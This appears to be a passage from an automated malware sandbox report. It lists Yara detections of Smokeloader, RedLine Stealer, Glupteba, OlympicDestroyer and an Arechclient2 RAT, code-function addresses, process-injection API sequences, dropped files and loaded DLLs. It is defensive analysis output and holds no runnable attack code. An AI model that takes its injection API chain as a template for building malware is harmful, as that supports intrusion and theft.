Source: Yara match	File source: 33.2.5AAB.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.eieeggj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.eieeggj.480e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.16GAuqLUFK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.16GAuqLUFK.exe.4d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.5AAB.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.eieeggj.490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.16GAuqLUFK.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.toolspub2.exe.5c15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2280019076.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2567378740.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2228963618.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2279751170.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2513498191.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2042498408.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2042178550.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1978169987.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2566695195.0000000000510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Yara detected Glupteba

Source: Yara match	File source: 22.2.288c47bbc1871b439df19ff4df68f076.exe.2f50e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.288c47bbc1871b439df19ff4df68f076.exe.3840000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.288c47bbc1871b439df19ff4df68f076.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.2459792248.0000000003C82000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2603121419.0000000003393000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2581006895.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.16E6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 7.3.16E6.exe.2540000.0.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 7.3.16E6.exe.2540000.0.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 14.0.28CC.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 38.2.nsn5FE8.tmp.exe.7b0e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 7.2.16E6.exe.23d0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 7.2.16E6.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 7.2.16E6.exe.23d0e67.1.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 21.0.3ABE.exe.c50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects downloader / injector Author: ditekSHen
Source: 0000001D.00000002.2507900128.00000000007DC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2280019076.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 00000021.00000002.2576715826.00000000005ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000026.00000002.3186242859.000000000080C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000021.00000002.2576846964.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2042153672.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2704339035.0000000002309000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000020.00000002.2567378740.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2342067283.00000000051FA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.2506318498.0000000005600000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2279751170.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000016.00000002.2594659373.0000000002B4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2042498408.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2279733437.0000000000480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000016.00000002.2603121419.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2279823208.00000000004BC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2042178550.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000020.00000002.2566695195.0000000000510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2042284755.000000000050D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000026.00000002.3185992517.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: C:\Users\user\AppData\Local\Temp\28CC.exe, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe, type: DROPPED	Matched rule: Detects downloader / injector Author: ditekSHen

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_00401590 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401590
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_004015CB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015CB
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_00403383 LdrLoadDll,GetModuleHandleA,NtEnumerateKey,	0_2_00403383
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0040159B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040159B
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_004015B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015B0
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015BC
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_00401590 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401590
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_004015CB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015CB
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_00403383 LdrLoadDll,GetModuleHandleA,NtEnumerateKey,	4_2_00403383
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_0040159B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040159B
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_004015B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015B0
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015BC
Source: C:\Users\user\AppData\Local\Temp\820.exe	Code function: 5_2_053C0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	5_2_053C0110
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00522010 malloc,memset,GetFileInformationByHandleEx,CreateFileW,GetLastError,GetFileInformationByHandle,GetLastError,GetLastError,GetLastError,NtQueryDirectoryFile,GetLastError,CloseHandle,	7_2_00522010
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_005225B0 NtQueryDirectoryFile,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	7_2_005225B0

Source: C:\Users\user\Desktop\16GAuqLUFK.exe

Code function: 0_2_00427AC0: GetLastError,GetAtomNameA,DeviceIoControl,SetDefaultCommConfigW,CopyFileExA,FreeEnvironmentStringsW,AddAtomW,GetCurrentDirectoryW,GetModuleHandleA,LocalLock,GetProfileStringW,GetEnvironmentVariableW,QueryMemoryResourceNotification,GetConsoleAliasExesLengthW,SetTapeParameters,IsDBCSLeadByte,GetTempFileNameW,MoveFileExW,OpenWaitableTimerW,GetLongPathNameW,GetCompressedFileSizeW,GetPrivateObjectSecurity,GetAtomNameA,

0_2_00427AC0

Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0042B92B	0_2_0042B92B
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0042C216	0_2_0042C216
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_00429ADB	0_2_00429ADB
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_00419B5F	0_2_00419B5F
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0041937F	0_2_0041937F
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0042B3E7	0_2_0042B3E7
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0042C51B	0_2_0042C51B
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_00410D8F	0_2_00410D8F
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0042F59B	0_2_0042F59B
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_00418EAA	0_2_00418EAA
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0042AEBC	0_2_0042AEBC
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_00419753	0_2_00419753
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_00419F7F	0_2_00419F7F
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0042BF9B	0_2_0042BF9B
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_0042B92B	4_2_0042B92B
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_0042C216	4_2_0042C216
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_00429ADB	4_2_00429ADB
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_00419B5F	4_2_00419B5F
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_0041937F	4_2_0041937F
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_0042B3E7	4_2_0042B3E7
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_0042C51B	4_2_0042C51B
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_00410D8F	4_2_00410D8F
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_0042F59B	4_2_0042F59B
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_00418EAA	4_2_00418EAA
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_0042AEBC	4_2_0042AEBC
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_00419753	4_2_00419753
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_00419F7F	4_2_00419F7F
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_0042BF9B	4_2_0042BF9B
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004C3120	7_2_004C3120
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004121D9	7_2_004121D9
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004242F5	7_2_004242F5
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004EE4B0	7_2_004EE4B0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00497700	7_2_00497700
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004CC710	7_2_004CC710
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004A77A0	7_2_004A77A0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00452800	7_2_00452800
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00451A40	7_2_00451A40
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0041FB03	7_2_0041FB03
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00465040	7_2_00465040
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00449060	7_2_00449060
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004AF060	7_2_004AF060
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004B3010	7_2_004B3010
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00446080	7_2_00446080
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00438090	7_2_00438090
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0045C11D	7_2_0045C11D
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004561A0	7_2_004561A0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004601A0	7_2_004601A0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00485250	7_2_00485250
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00452270	7_2_00452270
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004562C0	7_2_004562C0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004932D0	7_2_004932D0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004362F0	7_2_004362F0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00437290	7_2_00437290
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0044F2B0	7_2_0044F2B0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00463340	7_2_00463340
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00459310	7_2_00459310
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004383E0	7_2_004383E0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004333A0	7_2_004333A0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004873B0	7_2_004873B0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0044B540	7_2_0044B540
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00479510	7_2_00479510
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004765D0	7_2_004765D0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00442580	7_2_00442580
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00432590	7_2_00432590
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0045C5A0	7_2_0045C5A0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004436C0	7_2_004436C0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0044A6E0	7_2_0044A6E0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004596E0	7_2_004596E0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0045D720	7_2_0045D720
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00461780	7_2_00461780
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004AE7B0	7_2_004AE7B0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004A6880	7_2_004A6880
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004B4880	7_2_004B4880
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004C88A0	7_2_004C88A0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00460950	7_2_00460950
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0048D970	7_2_0048D970
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00442900	7_2_00442900
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004379A0	7_2_004379A0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004EDA00	7_2_004EDA00
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00438A90	7_2_00438A90
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0045BA90	7_2_0045BA90
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00446ABF	7_2_00446ABF
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0043DB90	7_2_0043DB90
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00491BA0	7_2_00491BA0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00459C10	7_2_00459C10
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0045CC20	7_2_0045CC20
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00446C35	7_2_00446C35
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0042EC30	7_2_0042EC30
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00445CC0	7_2_00445CC0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0046CCF8	7_2_0046CCF8
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00447C80	7_2_00447C80
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004B8C90	7_2_004B8C90
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00446D4A	7_2_00446D4A
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004B1D10	7_2_004B1D10
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00441D20	7_2_00441D20
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00466D20	7_2_00466D20
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00437D30	7_2_00437D30
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0044EDE0	7_2_0044EDE0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0048AE40	7_2_0048AE40
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004B9E10	7_2_004B9E10
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0045EE20	7_2_0045EE20
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00474E30	7_2_00474E30
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00446F7D	7_2_00446F7D
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00446F27	7_2_00446F27
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00454F30	7_2_00454F30
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00470F30	7_2_00470F30
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00475F90	7_2_00475F90
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_02483277	7_2_02483277
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0247F2C7	7_2_0247F2C7
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_024192C7	7_2_024192C7
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_024352A7	7_2_024352A7
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0248A347	7_2_0248A347
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0240B357	7_2_0240B357
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_02493387	7_2_02493387
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0241F047	7_2_0241F047
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0248A077	7_2_0248A077
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0242F087	7_2_0242F087
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_02445097	7_2_02445097
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_023E1177	7_2_023E1177
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_024461F7	7_2_024461F7
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_02425197	7_2_02425197
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_02457617	7_2_02457617
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_02449737	7_2_02449737
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_024127E7	7_2_024127E7
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_0241B7A7	7_2_0241B7A7
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_02430407	7_2_02430407
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_02426407	7_2_02426407
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_024224D7	7_2_024224D7
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_024554B7	7_2_024554B7

Source: Joe Sandbox View

Dropped File: C:\ProgramData\Drivers\csrss.exe F3C70EC32049139737226C85A87D453AC98C6A0FFC7747BA4F65118A1B8EF670

Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: String function: 0045FCF0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: String function: 00427FB0 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: String function: 00404910 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: String function: 004479D0 appears 152 times
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: String function: 00447570 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: String function: 00448300 appears 163 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5340 -ip 5340

Source: 6ED0.exe.2.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 6ED0.tmp.37.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 6ED0.tmp.37.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: 6ED0.tmp.37.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 6ED0.tmp.37.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped

Source: BroomSetup.exe.28.dr

Static PE information: Number of sections : 11 > 10

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: csunsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: swift.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: nfhwcrhk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: surewarehook.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: csunsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: aep.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: atasi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: swift.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: nfhwcrhk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: nuronssl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: surewarehook.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: ubsec.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: aep.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: atasi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: swift.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: nfhwcrhk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: nuronssl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: surewarehook.dll	Jump to behavior
